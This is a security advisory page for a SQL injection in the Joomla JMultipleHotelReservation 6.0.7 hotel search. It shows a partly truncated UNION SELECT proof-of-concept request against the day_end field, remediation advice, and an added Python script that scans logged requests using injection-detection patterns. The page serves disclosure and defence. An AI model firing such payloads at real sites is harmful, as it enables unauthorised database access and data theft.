# Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection

## Vulnerability overview

EDB-ID: 46232
Author: Ihsan Sencan
Type: WEBAPPS
Platform: PHP
Date: 2019-01-23

Description: The Joomla! component JMultipleHotelReservation 6.0.7 is vulnerable to SQL injection. The PoC below injects a `UNION SELECT` through the `day_end` field of the front-end hotel search (`controller=search&task=searchHotels`, posted to `search-hotels?view=hotels`), which means that value reaches the database query without being cast to an integer or bound as a parameter. The other date fields and `hotel_id` travel in the same request and should be reviewed with the same suspicion.

## Affected versions

Affected version: JMultipleHotelReservation 6.0.7
Tested on: WIN7 x64, Kali Linux x64

## Remediation

Update JMultipleHotelReservation to the latest version published by the vendor; the advisory names no fixed release and no CVE, so verify the fix directly by replaying the PoC request against the upgraded component. Independently of the upgrade, the search parameters should be cast to integers (or bound as query parameters) before they are used in SQL. A WAF rule matching `UNION SELECT` in these fields reduces noise but does not fix the bug.

## POC

```plaintext
Exploit Title: Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection
Dork: N/A
Date: 2019-01-23
Exploit Author: Ihsan Sencan
Vendor Homepage: http://csjunkie.com/
Software Link: https://extensions.joomla.org/extensions/extension-markets/booking-a-reservations/jmultiplehotelreservation/
Version: 6.0.7
Category: Webapps
Tested on: WIN7 x64,KaliLinux_x64
CVE: N/A

POC:

1)
http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels %31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c%45%43%54%28%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%54%74%

POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 905
Cookie: __cfduid=d35dbe40eb0461bf69a9165df9601951548240991; PHPSESSID=6cec795380ae5a2588be1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053fbfb8394c9543ab2169c4399aefc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=6&day_end UNION SELECT 
1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)
```

The mirrored request body is damaged at this point. After `(SELECT(@x:=0x00),` the fragment `(SELECT(@x)FROM` is repeated more than a hundred times across two lines and the body stops in the middle of that repetition, which cannot be the real payload: the `Content-Length: 905` header above puts the genuine body at 905 bytes, far shorter than the repetition shown. The hex-encoded GET variant (1) is likewise cut off after `%74%`. What survives is enough to identify the injection point (`day_end`) and the technique (`UNION SELECT` with a MySQL user variable `@x`), but the complete payload has to be taken from the original Exploit-DB entry 46232 rather than from this page.
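To triage requests against this endpoint from access, proxy or WAF logs, and to re-check the fix after upgrading, the following Python script is added here; it is not code from the advisory or from the vendor. It splits a form body the way the PoC requires (the `day_end` field in the PoC carries no `=` before the payload, so `parse_qs` would swallow the payload into the field name), percent-decodes each field repeatedly so double-encoded variants are caught, and reports every search parameter that is not a plain integer or that carries the `UNION SELECT` / `@x` markers of the PoC. The set of integer-only parameters is an assumption derived from the PoC body, the sample requests are constructed (the second is a shortened copy of the PoC body), and the hex string is the prefix of the GET PoC exactly as it appears above.

```python
"""Triage of search-hotels requests for the JMultipleHotelReservation injection.

Added example for this page, not code from the advisory or the vendor. It
sends nothing to a target: it inspects request bodies and query fragments as
they appear in access, proxy or WAF logs and reports the fields that carry a
SQL payload. NUMERIC_PARAMS and the sample requests are assumptions derived
from the PoC, not the component's documented input contract.
"""
import re
from urllib.parse import unquote_plus

# Fields the search form should only ever carry as integers (assumed from the PoC).
NUMERIC_PARAMS = {
    "year_start", "month_start", "day_start",
    "year_end", "month_end", "day_end", "hotel_id",
}

# Markers of the UNION / user-variable technique used in the PoC payload.
SQLI_MARKERS = re.compile(
    r"\bunion\b.*?\bselect\b|\bselect\s*\(|@x\b|information_schema",
    re.IGNORECASE | re.DOTALL,
)

# Leading identifier of a field name; anything after it is payload spill-over.
_NAME = re.compile(r"\s*([A-Za-z_][A-Za-z0-9_\[\]]*)")


def decode_fully(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are not missed.

    A dangling '%' (the GET PoC is cut off after one) is left alone by unquote_plus.
    """
    value = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def split_fields(body: str):
    """Yield (name, value) pairs from a form body.

    Unlike urllib's parse_qs this tolerates a field with no '=' between name and
    value (the PoC sends 'day_end UNION SELECT ...'): the first '=' found inside
    such a payload is kept as payload text instead of acting as the separator.
    """
    for raw in body.split("&"):
        if not raw:
            continue
        name_part, sep, value_part = raw.partition("=")
        decoded_name = decode_fully(name_part)
        match = _NAME.match(decoded_name)
        if match:
            name, spill = match.group(1), decoded_name[match.end():]
        else:
            name, spill = "", decoded_name
        if spill.strip():
            # Payload text followed the name without a separator: the '=' we
            # split on belongs to the payload, so glue it back on.
            value = spill + (sep + decode_fully(value_part) if sep else "")
        else:
            value = decode_fully(value_part)
        yield name, value.strip()


def find_injected_params(body: str) -> dict:
    """Map each offending field to its decoded value.

    A field is reported when it is one of the integer-only search parameters
    but does not decode to a plain integer, or when any field at all carries
    the injection markers.
    """
    findings = {}
    for name, value in split_fields(body):
        if name in NUMERIC_PARAMS and not value.isdigit():
            findings[name] = value
        elif SQLI_MARKERS.search(value):
            findings[name] = value
    return findings


def is_exploit_attempt(body: str) -> bool:
    return bool(find_injected_params(body))


# Constructed sample: a legitimate search.
BENIGN_BODY = (
    "controller=search&task=searchHotels&year_start=2019&month_start=01"
    "&day_start=23&year_end=2019&month_end=01&day_end=24&hotel_id=6"
)

# Constructed sample: the PoC body with the payload cut short.
POC_BODY = (
    "controller=search&task=searchHotels&year_start=2019&month_start=01"
    "&day_start=23&year_end=2019&month_end=01&hotel_id=6"
    "&day_end UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(t)))x),3"
)

# Constructed sample: the same idea hidden behind double percent-encoding.
DOUBLE_ENCODED_BODY = "controller=search&task=searchHotels&hotel_id=6%2520UNION%2520SELECT%25201"

# Prefix of the hex-encoded GET PoC, copied from the advisory (cut off in the source).
GET_FRAGMENT = (
    "%31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c"
    "%45%43%54%28%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%54%74%"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("poc", POC_BODY),
                        ("double-encoded", DOUBLE_ENCODED_BODY)):
        print(label, find_injected_params(body))
    print("GET PoC decodes to:", decode_fully(GET_FRAGMENT))
```

Feed `find_injected_params` the raw request body from your log source; the integer check is the part that still catches payloads which avoid the keyword markers, which is why the fix on the server side should be the same cast-to-integer rule rather than keyword filtering.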